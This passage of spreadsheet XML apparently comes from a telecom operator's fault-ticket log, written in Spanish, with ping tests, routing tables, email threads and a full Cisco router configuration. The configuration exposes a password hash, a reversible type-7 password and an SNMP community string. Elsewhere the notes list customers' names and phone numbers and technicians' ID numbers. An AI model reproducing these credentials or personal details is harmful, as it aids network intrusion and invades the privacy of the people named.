DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.87.184.0/27  DIRECT  0    0             D   10.87.184.1     VLANIF3750			</t>
  </si>
  <si>
    <t>F4573925</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SE PORCEDE A DEJAR EN ETAP PENDIENTE CLIENTE  POR ENERGIA COMERCIAL SE VALIDARA A FINAL DE TURNO .
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN CAMPERO 10.87.199.180
  PING 10.87.199.180: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.199.180 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.88
DISPLAY IP ROUTING-TABLE VPN-INSTANCE CAMPERO 10.87.199.180</t>
  </si>
  <si>
    <t>F4573930</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NORVIN RECINOS 30337011 MENCIONA QUE NO CUENTAN CON ENERGIA Y ACTUALMENTE ESTAN TRABAJANDO CON PLANTA
-ID 1001576831</t>
  </si>
  <si>
    <t>***--- SE HABLA CON ERNESTO GUEVARA (CLIENTE) SE LE INDICA QUE SE TIENE CONOCIMIENTO DESDE EL LADO DE MONITOREO TERNIUM QUE SE DEBE LLAMAR A PR A PRIMERA HORA HABIL --*-* CL COMENTA QUE LLAMA PARA SABER SINO ENCONTRAMOS ALGO ADICIONAL POR LO QUE SE COMENTA QUE SEGÚN EL DIAGNOSTICO ES NECESARIO DESCARTAR TEMA DE ENERGIA Y CONEXIONES EN SITIO POR LO QUE VALIDA QUE EL PR ABREN A LAS 07:00 HRS Y SOLICITA SE LLAME A ESA HORA -***</t>
  </si>
  <si>
    <t>F4573934</t>
  </si>
  <si>
    <t>SERVICIO 3G OPERATIVO POR PARTE DE CLARO OK  SE PORCEDE CON CIERRE
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PING -VPN TRANSFERENCIAS 10.218.51.62
  PING 10.218.51.62: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.51.62: BYTES=56 SEQUENCE=1 TTL=58 TIME=1152 MS
    REPLY FROM 10.218.51.62: BYTES=56 SEQUENCE=2 TTL=58 TIME=86 MS
    REPLY FROM 10.218.51.62: BYTES=56 SEQUENCE=3 TTL=58 TIME=122 MS
    REPLY FROM 10.218.51.62: BYTES=56 SEQUENCE=4 TTL=58 TIME=1175 MS
    REPLY FROM 10.218.51.62: BYTES=56 SEQUENCE=5 TTL=58 TIME=148 MS
  --- 10.218.51.62 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 86/536/1195 MS
PE
10.179.28.50
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DIS IP ROUTING VPN TRANSFERENCIAS 10.218.51.62
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.218.48.0/21  STATIC  1    0             RD  10.174.203.36   VLANIF3235</t>
  </si>
  <si>
    <t>F4573936</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDEE CON CIERRE POR ENERGIA COMERCIAL .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 15 MINUTOS)
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.3(3)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 28-MAY-14 05:26 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_GMG_GT_INTERNET_GUALAN_ZACAPA UPTIME IS 15 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.153-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784HA
2 GIGABIT ETHERNET INTERFACES
3 TERMINAL LINES
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
2 CELLULAR INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
249840K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1921/K9          FTX184784HA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CC_GMG_GT_INTERNET_GUALAN_ZACAPA#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3023 BYTES
!
VERSION 15.3
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_GMG_GT_INTERNET_GUALAN_ZACAPA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$BCB4$WL6YN.MZFNDJ2HIBSG51L.
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CHAT-SCRIPT HSPA-R7 "" "AT!SCACT=1,1" TIMEOUT 60 "OK"
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX184784HA
!
!
USERNAME GESTIONIP PASSWORD 7 05052358361C5C025D
!
REDUNDANCY
!
!
!
!
!
CONTROLLER CELLULAR 0/1
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.158.231 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/313900373T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.174.141.186 255.255.255.248
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 10240
 IP ADDRESS 190.148.254.37 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE CELLULAR0/1/0
 NO IP ADDRESS
 ENCAPSULATION SLIP
 DIALER IN-BAND
 DIALER STRING HSPA-R7
!
INTERFACE CELLULAR0/1/1
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.174.141.185
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_LATITUD 15 6 50.44N LONGITUD 89 21 39.22 O GUALAN ZACAPA
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
CONTROL-PLANE
!
!
BANNER LOGIN ^C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LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE 0/1/0
 SCRIPT DIALER HSPA-R7
 NO EXEC
LINE 0/1/1
 NO EXEC
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_GMG_GT_INTERNET_GUALAN_ZACAPA#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 23 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 23 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 26 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.431: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JAN  2 00:00:02.599: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = SECURITYK9 AND LICENSE = SECURITYK9
*MAY 23 04:50:21.119: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY 23 04:50:36.503: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
*MAY 23 04:50:36.507: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
*MAY 23 04:50:37.423: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 23 04:50:37.423: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 23 04:50:38.423: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 23 04:50:38.423: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 23 04:50:42.535: %CELLWAN-2-SIM_FAILURE: [CELLULAR0/1/0]: SIM READ FAILED
*MAY 23 04:50:42.627: %CELLWAN-2-MODEM_UP: MODEM IN HWIC SLOT 0/1 IS NOW UP
*MAY 23 04:50:42.635: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*MAY 22 22:50:45.183 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 04:50:45 UTC MON MAY 23 2022 TO 22:50:45 GUA SUN MAY 22 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*MAY 22 22:50:45.303 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 22 22:50:46.219 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 22 22:50:47.239 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 22 22:50:48.275 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY 22 22:50:49.259 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.3(3)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 28-MAY-14 05:26 BY PROD_REL_TEAM
*MAY 22 22:50:49.303 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_GMG_GT_INTERNET_GUALAN_ZACAPA IS UNDERGOING A COLD START
*MAY 22 22:50:49.935 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*MAY 22 22:50:49.935 GUA: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
*MAY 22 22:50:49.935 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*MAY 22 22:50:49.935 GUA: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
CC_GMG_GT_INTERNET_GUALAN_ZACAPA#
SHOW CLOCK
*23:05:40.683 GUA SUN MAY 22 2022
CC_GMG_GT_INTERNET_GUALAN_ZACAPA#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.141.185          0   084F.0AC8.683D  ARPA   GIGABITETHERNET0/0
INTERNET  10.174.141.186          -   881D.FC03.4920  ARPA   GIGABITETHERNET0/0
INTERNET  190.148.254.37          -   881D.FC03.4921  ARPA   GIGABITETHERNET0/1
INTERNET  190.148.254.38          0   0C8D.DBAF.D730  ARPA   GIGABITETHERNET0/1
CC_GMG_GT_INTERNET_GUALAN_ZACAPA#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/313900373T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
CE0/1/0                        UP             UP
CE0/1/1                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
CC_GMG_GT_INTERNET_GUALAN_ZACAPA#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.174.141.186  YES NVRAM  UP                    UP
GIGABITETHERNET0/1         190.148.254.37  YES NVRAM  UP                    UP
CELLULAR0/1/0              UNASSIGNED      YES UNSET  UP                    UP
CELLULAR0/1/1              UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.158.231  YES NVRAM  UP                    UP
CC_GMG_GT_INTERNET_GUALAN_ZACAPA#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.174.141.186
  PING 10.174.141.186: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.141.186 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.88
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.141.186
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.174.141.186/32  DIRECT  0    0                 0.0.0.0         VLANIF2205</t>
  </si>
  <si>
    <t>F4573941</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD -*-**
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: LUNES, 23 DE MAYO DE 2022 03:25
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 70019OH ::: TICKET CNOC IMBBL003987 ::: INTERMITENCIA
SE ENCUENTRA ACTIVO, PROCEDEMOS AL CIERRE, GRACIAS</t>
  </si>
  <si>
    <t>F4573964</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MYNOR CASTILLO AL 50001209  INIDCA QUE YA ESTAN LOS PERMISOS PARA QUE INGRESEN LOS
TECNICOS**
ID 1001556374
**</t>
  </si>
  <si>
    <t>ES NECESARIO REALIZAR VISITA TECNICA YA QUE CON EL CLIENTE SE REALIZARON PRUEBAS Y SI SE TIENE LINK DE FIBRA OPTICA PERO NO SE ALCANZA EL ETX1 DEL CLIENTE SLAMENTE EL DEL NODO Y SI SE CAE EL LINK CUANDO SE APAGA EL DEL CLEINTE PERO NO SE ALCANZA A NIVEL DE PING ES NECESARIO QUE SE PROECENTE PERSONAL TECNICO  EN EL CLEINTE PARA PODER REVIZAR EQUIPOS.</t>
  </si>
  <si>
    <t>SE COLOCARA EN ETAPA PENDIENTE CLIENTE PARA PODER REALIZAR PRUEBAS EN EL CLIENTE,</t>
  </si>
  <si>
    <t>F4574000</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE 87800210 MENCIONA QUE AYER HUBO UNA FUERTE TORMENTA Y NORMALMENTE CUANDO PASA ESO TIENEN PROBLEMS DE ENERGIA PERO ACTUALMENTE YA TODO ESTA FUNCIONANDO BIEN
-ID 1001586723</t>
  </si>
  <si>
    <t>ES ENCESARIO REALIZAR PRUEBAS DE 1 ER NIVEL CON LO EQUIPOS DEL CLIENTE EN EL PUNTO REMOTO SE PORCEDE A COLOCAR TTK EN ETAP PENDIENTE CLIENTE PARA VALIDAR TEMAS DE ENERGIA COMERCIAL O MANIPULACION DE CONECIONES.</t>
  </si>
  <si>
    <t>A ESPERA DE COLA DE CORREO
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 4:47
PARA: SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF LAS VEGAS ID: 1282420
ESTIMADO CLIENTE SE SOLICITA SU APOYO CON UN CONTACTO EN SITIO PARA PODER REALIZAR DESCARTES DE 1ER NIVEL EN EL ENLACE REPORTADO CON EL TICKET SD1128089 AGRADEZCO SU APOYO Y SU RESPUESTA.</t>
  </si>
  <si>
    <t>F4574011</t>
  </si>
  <si>
    <t>SE REALIZARON PRUEBAS CON EMMANUEL EN EL LUGAR  Y NO RESPONDEN LOS EQUIPOS ES NECESARIO SOLICITAR APOYO A INGENIERIA PARA LA REVICION DEL DISEÑIO DEL SERVICIO.</t>
  </si>
  <si>
    <t>F4574076</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GLADIS GUZMAN AL 50389341 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001557282
**</t>
  </si>
  <si>
    <t>F4574079</t>
  </si>
  <si>
    <t>CORREO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO PARA EL ATM CC_BANCO_AGRICOLA_SV_ATM_ESCUELA_MILITAR, ENLACE PRINCIPAL SE OBSERVA ALARMADO EN NUESTRO MONITOREO, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE, SOLICITA PROCEDER CON EL CIERRE DE FALLA YA QUE EN EL LUGAR ESTAN REMODELANDO, POR LO CUAL INDICA QUE PROXIMAMENTE ESTARAN REALIZANDO LA SOLICITUD DE TRASLADO.
DE: NESTOR DANIEL RAMIREZ FUENTES &lt;NEDRAMIR@BANCOAGRICOLA.COM.SV&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 15:27
PARA: MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;; KENNY ROBERT RIVERA JUAREZ &lt;KENNY.RIVERA@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ENE ORLANDO BAIRES QUINTEROS &lt;RBAIRES@BANCOAGRICOLA.COM.SV&gt;; ENLACES &lt;ENLACES@BANCOAGRICOLA.COM.SV&gt;; MONITOREOCOBA &lt;MONITOREOCOBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; SOPORTEL2COBA &lt;SOPORTEL2COBA@BANCOLOMBIA.ONMICROSOFT.COM&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RE: ENLACE ALARMADO CC_BANCO_AGRICOLA_SV_ATM_ESCUELA_MILITAR IP2001264SV
BUEN DÍA,
ESTIMADOS FAVOR CERRAR ESTE TICKET, SE ESTÁN REALIZANDO REMODELACIONES EN ESTE LUGAR Y SE  TRASLADARA EL CAJERO, PRÓXIMAMENTE LES SOLICITAREMOS EL TRASLADO DEL ENLACE.
SALUDOS.-
ATENTAMENTE.-</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO NUEVAMENTE A CLIENTE
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO PARA EL ATM CC_BANCO_AGRICOLA_SV_ATM_ESCUELA_MILITAR, ENLACE PRINCIPAL SE OBSERVA ALARMADO EN NUESTRO MONITOREO, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>CORREO HA SIDO ENVIADO || EN ESPERA DE RESPUESTA
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: LUNES, 23 DE MAYO DE 2022 08:31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CC_BANCO_AGRICOLA_SV_ATM_ESCUELA_MILITAR IP2001264SV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
TICKET: F4574079
ID: IP2001264SV
IDENTIFICADOR DEL CLIENTE: CC_BANCO_AGRICOLA_SV_ATM_ESCUELA_MILITAR
UBICADO EN: ANTIGUO CUSCATLAN             FINCA EL ESPINO               AV. JERUSALEM                 FINAL AVE.                    C.CHILTIUPAN/AV.GERARDO BARRIO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4574080</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELMAN RAMOS 33993636 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001655873</t>
  </si>
  <si>
    <t>F4574089</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEYDI DE PAZ 55952379 MENCIONA QUE SI CUENTAN CON ENERGIA ELECTRICA Y YA APLICARON REINICIO PERO PERSISTE EL PRBLEMA
-ID 1001589278
NOMBRE DEL CLIENTE: EMFAMA, S.A.
UBICACIÓN:7 AVENIDA 86-10 ZONA 1 PPTUN, AUN COSTADO DEL CENTRO DE SALUD
CONTACTO EN SITIO: HEYDI DE PAZ 55952379
HORARIO DE ATENCION: 7:00 - 21 HRS
GESTIÓN DE PERMISOS: VALIDAR CON LA CENTRAL SI ES NECESARIO SOLICITAR PERMISOS</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS###
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: LUNES, 23 DE MAYO DE 2022 13:21
PARA: MARLONJOSE@GMAIL.COM &lt;MARLONJOSE@GMAIL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 697500003T |EMFAMA, S.A. . | SUCURSAL MODERNA POPTUN 2 - BARRIO EL CENTRO, POPTÃ-Â¿Â¿N PETEN
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 697500003T |EMFAMA, S.A. . | SUCURSAL MODERNA POPTUN 2 - BARRIO EL CENTRO, POPTÃ-Â¿Â¿N PETEN
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
2569023051705    790442       FRANCISCO JAVIER ZEPEDA REYES
3053763810206    530153       IRVIN CASTAÑEDA
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4574090</t>
  </si>
  <si>
    <t>ENLACE ACTIVO EQUIPO EN NODO INHIBIDO IDU SE REINICIA ENLACE RESTABLECE CPE NO SE TIENE GESTION
VPN DESCO 10.152.194.146
&lt;AAPASVZTN1D1EID1&gt;PING -M 10 -Q -VPN DESCO 10.152.194.146
  PING 10.152.194.146: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.152.194.146 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/4/5 MS
ENLACE ACTIVO Y ESTABLE
&lt;AAPASVZTN1D1EID1&gt;PING -C 1500   -M 30 -B -VPN DESCO 10.152.194.146
  PING 10.152.194.146: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.152.194.146 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
